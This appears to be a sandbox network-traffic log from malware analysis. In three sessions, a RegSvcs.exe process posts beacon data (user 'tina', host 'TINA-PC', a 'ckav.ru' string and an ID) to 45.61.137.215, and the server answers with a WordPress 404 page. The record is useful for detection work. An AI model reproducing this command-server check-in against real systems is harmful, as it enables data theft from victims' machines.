May 29, 2024 15:43:17.207106113 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49740	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:17.361906052 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:17.366785049 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:19.837291002 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:19.837321043 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:19.837331057 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:19.837357044 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:19.837368011 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:19.837384939 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:19.837397099 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:19.837407112 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:19.837419033 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:19.837430954 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49741	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:20.008059025 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:20.013079882 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:22.595927954 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:22.595988035 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:22.596023083 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:22.596054077 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:22.596159935 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:22.596218109 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:43:22.596272945 CEST	776	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:43:22.596337080 CEST	1236	IN	Data Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
May 29, 2024 15:43:22.596370935 CEST	1236	IN	Data Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color
May 29, 2024 15:43:22.596446991 CEST	1016	IN	Data Raw: 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f Data Ascii: portant;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49742	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:22.752548933 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:22.757580996 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:25.290366888 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:25.290412903 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:25.290431023 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:25.290441990 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:25.290452957 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:25.290463924 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:25.290474892 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:25.290487051 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
